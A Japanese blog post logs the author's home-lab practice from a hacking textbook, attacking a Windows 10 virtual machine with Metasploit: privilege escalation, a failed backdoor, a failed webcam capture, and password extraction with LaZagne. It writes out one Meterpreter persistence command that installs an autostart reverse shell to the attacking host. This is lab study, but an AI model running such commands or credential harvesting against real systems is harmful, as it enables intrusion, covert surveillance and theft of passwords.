#7 Windows10のハッキング 3

|

【ハッキングラボを作ろう】#7 Windows10のハッキング 3

 IPUSIRON著「ハッキング・ラボのつくりかた 仮想環境におけるハッカー体験学習」で勉強しています。

 前回はWindow10をペネトレーションツールのMetasploitを使って攻撃して、攻撃側のKali側から侵入先のWin10の画面のスクショを取るところまでいきました。

 その続きを進めていたのですが、色々ものすごくハマりました。ハマった箇所も記しますが、解決しなかったのが多いですね。。。

 今回はWindowsの権限取得などを勧めていきます。前回は(6)まで行きましたのでその続きです。

(7)権限を昇格させる(SYSTEM権限を取得する)

 Meterpreterプロンプトからgetuidコマンドで権限昇格をしてみますが、失敗するので、UACを回避するモジュールを探します。ここは書籍に従って進めていきます。なんとかSYSTEM権限を得られました。

(8)バックドアを設置する。

 問題はここです。ここでものすごく嵌って結局解決できませんでした。

 Meterpreterプロンプトから以下のコマンドを入力するのですが、

 run persistence -X -i 60 -P windows/x64/meterpreter/reverse_tcp -p 4444 -r 10.0.0.2

 Could not execute persistence: ArgumentError wrong number of arguments (given 2, expected 0..1)

 というエラーが出て先に進みません。色々調べましたが解決策が見つかりませんでした。。。

 ということでバックドアの作成はあきらめ先に進みます。

(9)ターゲット端末のWebカメラで盗撮する。

 これもうまくいきませんでした。WindowsのノートPCの内蔵WebカメラはVirtualBoxでは認識していて、Kaliでも起動するのですが、MeterpreterプロンプトからWebcam_listを実行しても"No webcams were found”と出て先に進みませんでした。USB接続のカメラを推奨しているようですが、持ち合わせがないのでここも飛ばします。

(10)パスワードを探し出す。

 Windowsに格納されているパスワードを探し出します。ここではLaZagneというツールを使います。ここは本書どおりに進めていけます。

 一応、登録しておいたアカウントは見つかったのですが、特に上2つのは肝心なパスワードが空欄になっていて取得できていません。Edgeに入っているパスワードなのですが、そう簡単には抜けない仕組みになっているのかもしれません。一番下のSkypeは特にいじっていないのでデフォルトのもののような気がします。



(11)ブラウザの履歴を調べる

 windows/gather/forensics/browser_historyというモジュールを使っていくのですが、うまく実行できませんでした。今日もここまでで4時間は費やしていて、心折れてきたのでまた今度にします。

コメント0

お気に入りに追加しました お気に入りから削除しました